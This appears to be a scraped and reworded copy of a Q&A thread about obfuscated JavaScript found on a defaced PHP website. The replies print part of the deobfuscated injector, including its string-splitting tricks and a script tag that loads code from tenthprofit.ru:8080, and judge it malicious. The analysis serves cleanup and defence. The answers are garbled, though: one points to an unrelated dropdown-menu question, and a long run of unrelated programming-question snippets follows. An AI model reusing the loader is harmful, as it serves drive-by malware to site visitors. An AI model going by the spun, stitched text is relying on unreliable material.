I came across this script on a client's PHP website that had been defaced. I'm not sure about the nature of this script and whether it poses any security threat. Can someone help me analyze this code? Please see the script below...
var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
// rest of the script...
If you failed to include it, then by all means it qualifies as malicious.
Indeed, this appears to be a malicious script disguised as part of Google:
new String("/goo" + "gle." + L("com/DyBg", 0, 4)
However, it actually performs unauthorized actions such as redirection and information gathering on tenthprofit.ru
new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
The best course of action is to save this code for reference and remove it from the webpage.
To improve readability, you can use: Jsbeautifier
This piece of code inserts a new <script> element into the HTML file's body section, attempting to load "tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php" as the source of the script tag. However, the malicious content has since been removed, rendering it harmless.
The following line is appended to the end of the BODY tag:
<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>
Check out the "neatly formatted script":
var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
var F = ["hu"];
function L(Lc, O, d) {
return Lc.substr(O, d);
}
OH = 55345;
OH -= 37;
var x = document;
QM = 6929;
QM++;
q = 25298;
q -= 65;
var t = '';
var vs = {};
var u = ["hR"];
var Oi = RegExp;
var A = {
kh: "LQ"
};
var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
yz = {
Ec: false
};
function y(Lc, O) {
hI = 24414;
hI++;
g = {};
a = 28529;
a--;
var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
var m = new Oi(d, String("g"));
n = {
kW: 40818
};
ly = {
...
(Continued in original format)I found this part particularly unsettling:
s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
This line assigns a URL from tenthprofit.ru to s[G].
If you are seeking a solution to your query, it seems imperative to enhance the format of your code for improved readability. It should be presented in a more user-friendly manner.
You may find guidance on this topic at How to create a dropdown menu in HTML?
Update
Furthermore, it appears that the inclusion of your "Malicious" script has caused disruption to the SO site. Please address this issue promptly as it poses a potential threat.
According to its inclusion in a defacement, it clearly falls under the category of malicious content. The suspicious code seems to be designed to lead users to tenthprofit.ru, although I have not executed it myself and can only make assumptions based on a quick review.
I'm currently working on creating a component that takes a title text and a tag as properties to display the title in the corresponding h1, h2, etc. tag. This is my first time using the sweet <script setup> method, but I've encountered a pr ...
Hey there, I'm in need of some assistance. I have a Codepen page where I am working on displaying 4 random shapes (Square, Triangle, Circle, and Cross) one at a time, with the computer speaking the name of each shape when clicked. I want to pull these ...
I am currently implementing an array sorting functionality using the MVC approach. The array called "array" is used to store values provided at runtime. Within the view, there is a textbox and a button for user input of integer values. Upon clicking the bu ...
Despite following the instructions and initiating Fawn as stated in the document, I'm still encountering an error message that says Invalid Condition. Can anyone help me identify what is causing this issue? Thank you to all the helpers. await new Fawn ...
Is it possible to create a div with a unique shape? I know that by default, divs are rectangular and you can achieve some shapes using the border-radius property, but what I really want is a semi-leaf shaped element. Something like this: The image might n ...
I have a viewmodel that contains a list of objects which I am currently iterating through. Each object has a specific class associated with it. My objective is to open up the item for viewing upon clicking on it. However, I am unsure of how to retrieve the ...
Considering StackOverflow's recommendation to ask a question rather than start a discussion, let's explore two methods using HTTPAsyncRquest to update a webpage without refreshing it: 1) Parsing/interpreting data returned by AsyncRequest to buil ...
Check out this JavaScript code snippet I wrote: function Show(output, startX, startY){ var c = document.getElementById("myCanvas"); var context = c.getContext("2d"); context.arc(startX, startY, 3, 0, Math.PI*2, true); context.fill( ...
I have been working on developing a node/express server and decided to implement passport-local for user authentication using a local MongoDB server. I am encountering an issue where the page does not redirect as expected after submitting the login form wi ...
form <form action="assign_web_menu_action.php" method="post" name="form1" id="form1" > <table id='menuAssign'> <tbody> <tr class="clone_row"> <td> <input type="text" name="menuname[]" id="menuname1" ...
I've been experimenting with the Vivus JS library, which is fantastic for animating paths such as drawing an image. However, I'm facing an issue where my SVG icon should animate to a 100% line-width, but it's not working as expected. Interes ...
Seeking assistance with resetting a div on a Modal after it has been closed. The issue I am facing with my pop-up is that the div retains the previous styling of display: none instead of reverting to display: flex. I have searched for a solution without su ...
Recently, I've started learning jQuery and came across an AJAX example that intrigued me. The task at hand is to pass a PHP variable to another PHP page without refreshing the entire webpage. After some tinkering, I managed to come up with the code sn ...
Encountering this particular error message in the console while attempting to run the application: webcomponents-lite.js:64Uncaught TypeError: Cannot read property 'getAttribute' of null at webcomponents-lite.js:64 at Object.549 (webcomp ...
Resolved: Upon inspecting my version of jquery-validate.js, I discovered that it was missing the onkeyup handler. Despite using version 1.12 Opre, which should have had this functionality according to its Github history from 2013, it seemed like there may ...
Imagine a notepad app with editing capabilities that utilizes the Code Mirror library. Since the app is built using NWJS, I am unsure how to directly open a text file within my app. In other native apps, you can typically select an option in the context ...
On my page, I have multiple choice question options that are structured like this: https://i.sstatic.net/oMH7t.png The following is the HTML code for the options section so far: <div v-for="(option, index) in optionsForFrontend"> <di ...
In my current project, I am developing a simple Next Js application consisting of just two pages. index.tsx: import React from "react"; import Link from "next/link"; export default function Index() { return ( <di ...
I'm facing a compatibility issue specifically with Safari and all iOS devices. I've developed this jQuery code for a project, but it seems to have trouble working with Safari. Interestingly, it works perfectly fine with Chrome, Firefox, and even ...
Recently, I have encountered an issue on my web pages where the $("#elementId").change() function does not work for elements on a JSP page. However, using $(document).on("change" "elementId") seems to work. It appears that the page's document is being ...